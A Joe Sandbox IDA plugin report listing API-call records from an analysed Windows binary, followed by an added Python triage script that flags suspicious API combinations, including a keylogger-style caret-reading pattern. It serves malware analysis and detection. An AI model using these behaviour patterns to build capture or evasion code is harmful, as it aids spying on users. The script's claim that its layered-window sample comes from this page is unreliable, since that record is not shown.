                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 2507767853-234962358
                                                                                                                                                                  • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                  • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                                                                  • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                  • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                    • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                    • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                    • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                  • GetFocus.USER32 ref: 0046157B
                                                                                                                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                                                                  • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows
                                                                                                                                                                  • String ID: %s%d
                                                                                                                                                                  • API String ID: 3342072951-1110647743
                                                                                                                                                                  • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                  • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                                                                  • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                  • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                                                  • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                  • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                                                                  • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                  • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                                                                  APIs
                                                                                                                                                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess
                                                                                                                                                                  • String ID: crts
                                                                                                                                                                  • API String ID: 1361684037-3724388283
                                                                                                                                                                  • Opcode ID: 434ffcbdc5e7f9b33e35ea07cff199a3d03e95f14558a5aa98a073663993cfb7
                                                                                                                                                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                                                                  • Opcode Fuzzy Hash: 434ffcbdc5e7f9b33e35ea07cff199a3d03e95f14558a5aa98a073663993cfb7
                                                                                                                                                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                                                  • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                                                  • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$LabelVolume
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 2006950084-234962358
                                                                                                                                                                  • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                  • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                                                  • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                  • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
APIs
• GetMenuItemInfoW.USER32 ref: 00449727
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
• DrawMenuBar.USER32 ref: 00449761
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
• InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CriticalEnterHandleIncrementInterlockedModuleSection
• String ID: KERNEL32.DLL$pI
• API String ID: 2650740867-197072765
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCreateFile
• API String ID: 2574300362-275556492
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpSendEcho
• API String ID: 2574300362-58917771
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430E8D
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00430E9F
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
APIs
• GetModuleHandleW.KERNEL32(mscoree.dll,?,0041168F,004115F6,?,0041823B,000000FF,0000001E,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D), ref: 00411661
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411671
Similarity
• API ID: AddressHandleModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 1646373207-1276376045
APIs
• VariantInit.OLEAUT32(?), ref: 0047950F
• SysAllocString.OLEAUT32(00000000), ref: 004795D8
• VariantCopy.OLEAUT32(?,?), ref: 0047960F
• VariantClear.OLEAUT32(?), ref: 00479650
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
• GetWindowRect.USER32(?,?), ref: 00449A4A
• ScreenToClient.USER32(?,?), ref: 00449A80
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
• ClientToScreen.USER32(00000000,?), ref: 0044169A
• GetWindowRect.USER32(?,?), ref: 00441722
• PtInRect.USER32(?,?,?), ref: 00441734
• MessageBeep.USER32(00000000), ref: 004417AD
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
• Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
• Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
• Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
• Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
• Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
• Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
APIs
• GetParent.USER32(?), ref: 004503C8
• DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
• DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
• DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Proc$Parent
• String ID:
• API String ID: 2351499541-0
• Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
• Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
• Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
• Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
• TranslateMessage.USER32(?), ref: 00442B01
• DispatchMessageW.USER32(?), ref: 00442B0B
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
• Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
• Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
• Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
• Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
APIs
• GetForegroundWindow.USER32 ref: 0047439C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetCaretPos.USER32(?), ref: 004743B2
• ClientToScreen.USER32(00000000,?), ref: 004743E8
• GetForegroundWindow.USER32 ref: 004743EE
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
• Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
• Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
• Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
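The function records on this page list raw API sequences but do not say what they add up to. The following Python triage script is an added example, not code from Joe Sandbox or from the analysed sample: it parses listings in the report's own "APIs" format (the "Name.MODULE(args), ref: ADDR" lines, including the indented "Part of subcall function" entries) and flags three combinations that appear in this page's records: AttachThreadInput together with GetCaretPos (reading the caret of a window owned by another thread), SetWindowLongW plus SetLayeredWindowAttributes with dwFlags 2 (LWA_ALPHA, window opacity), and CreateHardLinkW followed by GetLastError, DeleteFileW and a second CreateHardLinkW. The embedded input is a constructed excerpt copied from this page's records; the rule names and descriptions are this example's own, and treating the printed index 000000EC as the low bits of GWL_EXSTYLE (-20, 0xFFFFFFEC) is an assumption.

```python
"""Added triage example (not Joe Sandbox or sample code): parse records in a
Joe Sandbox "APIs" listing and flag API combinations worth a closer look."""
import re
from typing import Any, Dict, List, Tuple

# Constructed excerpt: three records copied in the report's own format.
SAMPLE_LISTING = """\
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
APIs
• GetForegroundWindow.USER32 ref: 0047439C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetCaretPos.USER32(?), ref: 004743B2
• ClientToScreen.USER32(00000000,?), ref: 004743E8
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
"""

# One call line: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE, optional "(args)", optional comma, then "ref: ADDR".
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)"
)

Call = Dict[str, Any]


def parse_records(text: str) -> List[List[Call]]:
    """Split the listing into per-function records; each starts with an 'APIs' line."""
    records: List[List[Call]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append([])
            continue
        m = CALL_RE.search(line)
        if m and records:
            args = m.group("args")
            records[-1].append({
                "api": m.group("api"),
                "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref").upper(),
                "subcall": (m.group("sub") or "").upper() or None,
            })
    return records


def _has(record: List[Call], *names: str) -> bool:
    present = {c["api"] for c in record}
    return all(n in present for n in names)


def _args(record: List[Call], name: str) -> List[str]:
    return next((list(c["args"]) for c in record if c["api"] == name), [])


def _layered_alpha(record: List[Call]) -> bool:
    # SetLayeredWindowAttributes(hwnd, crKey, bAlpha, dwFlags): dwFlags 2 is LWA_ALPHA.
    # The report prints the SetWindowLongW index as 000000EC; GWL_EXSTYLE is -20
    # (0xFFFFFFEC), so matching on the trailing "EC" is an assumption of this example.
    sl, swl = _args(record, "SetLayeredWindowAttributes"), _args(record, "SetWindowLongW")
    return (_has(record, "SetWindowLongW", "SetLayeredWindowAttributes")
            and len(sl) > 3 and sl[3] == "00000002"
            and len(swl) > 1 and swl[1].endswith("EC"))


# (rule id, description, predicate over one record); names are this example's own.
RULES = [
    ("caret-of-foreign-window",
     "AttachThreadInput + GetCaretPos: reads the caret position of a window owned "
     "by another thread (a keylogger / screen-capture positioning pattern)",
     lambda r: _has(r, "AttachThreadInput", "GetCaretPos")),
    ("layered-window-alpha",
     "SetWindowLongW(GWL_EXSTYLE) + SetLayeredWindowAttributes(LWA_ALPHA): sets "
     "window opacity; alpha 0 makes the window invisible",
     _layered_alpha),
    ("hardlink-replace",
     "CreateHardLinkW, GetLastError, DeleteFileW, CreateHardLinkW: links a file under "
     "a second path, removing an existing file when the first link attempt fails",
     lambda r: _has(r, "CreateHardLinkW", "GetLastError", "DeleteFileW")),
]


def triage(records: List[List[Call]]) -> List[Tuple[str, str, str]]:
    """Return (ref of the record's first call, rule id, description) per match."""
    findings: List[Tuple[str, str, str]] = []
    for rec in records:
        for rule_id, desc, pred in RULES:
            if rec and pred(rec):
                findings.append((str(rec[0]["ref"]), rule_id, desc))
    return findings


if __name__ == "__main__":
    for ref, rule_id, desc in triage(parse_records(SAMPLE_LISTING)):
        print(f"{ref}: {rule_id}: {desc}")
```

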